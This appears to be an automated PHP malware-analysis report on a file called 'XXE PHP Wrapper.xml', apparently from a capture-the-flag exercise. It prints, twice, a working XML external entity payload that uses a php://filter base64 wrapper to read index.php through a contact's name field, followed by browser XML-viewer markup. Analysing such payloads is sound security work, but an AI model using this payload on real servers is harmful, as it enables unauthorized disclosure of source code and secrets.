PHP Malware Analysis
XXE PHP Wrapper.xml
md5: d322684897f44686d9cd1f93e5b8e8eb
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
URLs
Deobfuscated PHP code
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<address>42 rue du CTF</address>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>
Execution traces
Generated HTML code
<html xmlns="http://www.w3.org/1999/xhtml"><head><style id="xml-viewer-style">/* Copyright 2014 The Chromium Authors
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
:root {
color-scheme: light dark;
}
div.header {
border-bottom: 2px solid black;
padding-bottom: 5px;
margin: 10px;
}
@media (prefers-color-scheme: dark) {
div.header {
border-bottom: 2px solid white;
}
}
div.folder > div.hidden {
display:none;
}
div.folder > span.hidden {
display:none;
}
.pretty-print {
margin-top: 1em;
margin-left: 20px;
font-family: monospace;
font-size: 13px;
}
#webkit-xml-viewer-source-xml {
display: none;
}
.opened {
margin-left: 1em;
}
.comment {
white-space: pre;
}
.folder-button {
user-select: none;
cursor: pointer;
display: inline-block;
margin-left: -10px;
width: 10px;
background-repeat: no-repeat;
background-position: left top;
vertical-align: bottom;
}
.fold {
background: url("data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' fill='%23909090' width='10' height='10'><path d='M0 0 L8 0 L4 7 Z'/></svg>");
height: 10px;
}
.open {
background: url("data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' fill='%23909090' width='10' height='10'><path d='M0 0 L0 8 L7 4 Z'/></svg>");
height: 10px;
}
</style></head><body><div id="webkit-xml-viewer-source-xml"><contacts xmlns="">
<contact>
<name>Jean Dupont</name>
<phone>00 11 22 33 44</phone>
<address>42 rue du CTF</address>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts></div><div class="header"><span>This XML file does not appear to have any style information associated with it. The document tree is shown below.</span><br /></div><div class="pretty-print"><div class="folder" id="folder0"><div class="line"><span class="folder-button fold"></span><span class="html-tag"><contacts></span></div><div class="opened"><span>
</span><div class="folder" id="folder1"><div class="line"><span class="folder-button fold"></span><span class="html-tag"><contact></span></div><div class="opened"><span>
</span><div class="line"><span class="html-tag"><name></span><span>Jean Dupont</span><span class="html-tag"></name></span></div><span>
</span><div class="line"><span class="html-tag"><phone></span><span>00 11 22 33 44</span><span class="html-tag"></phone></span></div><span>
</span><div class="line"><span class="html-tag"><address></span><span>42 rue du CTF</span><span class="html-tag"></address></span></div><span>
</span><div class="line"><span class="html-tag"><zipcode></span><span>75000</span><span class="html-tag"></zipcode></span></div><span>
</span><div class="line"><span class="html-tag"><city></span><span>Paris</span><span class="html-tag"></city></span></div><span>
</span></div><span class="folded hidden">...</span><div class="line"><span class="html-tag"></contact></span></div></div><span>
</span></div><span class="folded hidden">...</span><div class="line"><span class="html-tag"></contacts></span></div></div></div></body></html>Original PHP code
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<address>42 rue du CTF</address>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>